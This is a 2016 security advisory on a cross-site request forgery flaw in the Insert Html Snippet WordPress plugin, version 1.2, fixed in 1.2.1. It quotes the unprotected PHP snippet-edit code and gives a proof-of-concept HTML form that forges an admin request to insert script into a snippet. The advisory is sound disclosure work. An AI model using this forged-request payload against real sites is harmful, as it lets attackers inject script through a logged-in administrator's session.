------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet WordPress
Plugin version 1.2.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet version 1.2.1.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html
This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See for example the code that is used to edit a snippet.
if(isset($_POST) && isset($_POST['updateSubmit'])){
// echo '<pre>';
// print_r($_POST);
// die("JJJ");
$_POST = stripslashes_deep($_POST);
$_POST = xyz_trim_deep($_POST);
$xyz_ihs_snippetId = $_GET['snippetId'];
$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);
$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
$xyz_ihs_content = $_POST['snippetContent'];
if($xyz_ihs_title != "" && $xyz_ihs_content != ""){
if(ctype_alnum($temp_xyz_ihs_title))
{
$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;
if($snippet_count == 0){
$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';
$wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
<input type="hidden" name="snippetId" value="1" />
<input type="hidden" name="snippetTitle" value="Fu" />
<input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
<input type="hidden" name="updateSubmit" value="Update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.